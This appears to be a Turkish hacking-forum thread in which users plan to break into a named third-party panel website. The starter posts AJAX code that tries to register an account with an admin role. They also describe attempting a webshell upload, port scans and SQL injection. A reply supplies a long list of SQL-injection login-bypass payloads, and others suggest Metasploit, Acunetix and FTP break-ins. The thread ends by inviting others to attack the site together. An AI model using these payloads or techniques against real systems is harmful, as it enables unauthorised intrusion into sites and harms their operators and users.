Bu Site hacklenebilirmi ?
- Konuyu başlatan en4loss
- Başlangıç tarihi
- Konuyu başlatan
- #3
cevapladığınız için teşekkür ederim. Login bypass nasıl yaparım ? sql injection yok inputtan alınan veriyi ajax ile kontrol ediyordur büyük ihtimalle ama hinede deniyeyim. birde panel scripti olduğu için fazla sorgu yapmadan patlatmaya çalışıyorum. ben registera role sokmayı denedimde yemedi
Kod:
$(document).ready(function () {
alert(1)
var username = "dayi31"; // Kullanıcı adı
var email = "[email protected]"; // Kullanıcı e-posta adresi
var password = "dayi31"; // Kullanıcı şifresi
var turnstile = "ben sildim"; // Turnstile doğrulama token
var role = "admin"
// AJAX isteği
$.ajax({
url: 'https://siteadi.com/server/authorization', // Tam URL
type: 'POST',
dataType: 'json',
data: {
username: username,
email: email,
password: password,
turnstile: turnstile,
action: action,
role: role
},
success: function (response) {
if (response.status == 'success') {
alert(response.message, 'Başarılı');
setTimeout(() => window.location.href = 'home', 2000);
} else {
alert(response.message, 'Hata');
}
},
error: function () {
alert('İstek gönderilirken bir hata oluştu, lütfen sayfayı yenileyip tekrar deneyin.', 'Hata');
}
});
});ben normalde yazılımcıyımda bu veletlei görünce denemek istedim verebileceğin bir tavsiye varmı ?
Moderatör tarafında düzenlendi:
Login bypass için bunları deneyebilirsin.
- ” or 1=1 or “”=”
- ” OR ”=”
- hey’ or 1=1–
- ‘ or 1=1–
- ” or 1=1–
- ‘ or ‘a’=’a
- ‘) or (‘a’=’a
- ‘hi’ or ‘x’=’x’;
- ‘or select *
- “)) or ((“x”))=((“x
- admin”or 1=1 or “”=”
- admin’–
- \x27\x6F\x72 SELECT *
- \x27\x4F\x52 SELECT *
- x’ or 1=1 or ‘x’=’y
- hi”) or (“a”=”a
- ” or “a”=”a
- or 1=1–
- or 1=1–
- ”Or 1 = 1′
- ‘OR”=’
- ‘ OR ”=’
- ‘ or 1=1 or ”=’
- anything’ OR ‘x’=’x
- ”Or’=’Or”
- 1’or’1’=’1
- admin”) or (“1″=”1”–
- ” or “”+”
- 'or'='or'
siz dosyaları listeliyorsunuz ama tam olarak giremediniz sanıyorum dosya cekemiyorsunuz sanırım portlardan hangisinede acık var ona bakın sonra msfconsole ile search ile taratın ve önce exploit kullanın bence zaten siyah ekranda linux komutlarını yurutuyorsanız hacklediniz demektir
bu bir zafiyetmi sizce ?
- Konuyu başlatan
- #7
Hocam register olunuyor zaten onda problem yok işte role denedim yemedi sorgu kısmında injection demek lazım orda bulursam db ye erişirim
Genelde SQL açığı çok bulunmuyor bunlarda kapatıyorlar ama şansını denemek istersen Acunetix gibi programlara bak.
- Konuyu başlatan
- #9
Client dan dosyaları açtığım için php görünmüyor görünse zaten patlatmam 10sn exploit denemeliyim doğru diyorsunuz
- Konuyu başlatan
- #10
Hocam scripti nasıl çalıyorlar peki ftp yi patlatarak fln mı
- Konuyu başlatan
- #11
Keşke olsa
))
ftp den girsen zaten sitenin tamamı senin istedigini yap ama seninki daha cok sql acıgı gibi duruyor injection gerektirebilir bence yani olma ihtimali var büyük oranda diye düşünüyorum
yanliş hatırlamıyorsam 3 ana enjection türü var bunun bazılarıda ikiye ayrılıyor felan ama 3 ana enjjection seceneginden biri hic görünmeyen hatta cok nadir görünen senin bakman gereken 2 secenek var zaten diye hatırlıyorum
- Konuyu başlatan
- #14
sunucuda php çalışıyor hocam cloudflare olduğu için port açıkları bulamadım nmap de sql injection da yok xss de yok profil resminde webshell ekliyeyim dedim o da yemedi cimere mi salsam acaba
bu tarz paneller tek bir altyapıdan türetilmiş şeyler attığın backend kodlarının bazılarını işine yarayacaksa sağlayabilirim incelemen için
- Konuyu başlatan
- #17
Ya patlatsam daha iyi olurdu.. ama işime yaramak değilde incelemek isterim e tabi temelinde db query ler yatıyorda lamerlar nasıl yazmış merak ettim atmak isterseniz yok demem valla. Birde site ismi ezik.fun belki biri patlatır patlatırsa haber verirse sevinirim
siteyi atar mısınız incelemek isterim de
bu bir zafiyetmi sizce ?
- Konuyu başlatan
- #19
ezik.fun isterseniz beraber inceliyelim bana discorddan yazarsanız dc:sungercode
Ben niye giremiyorum siteye
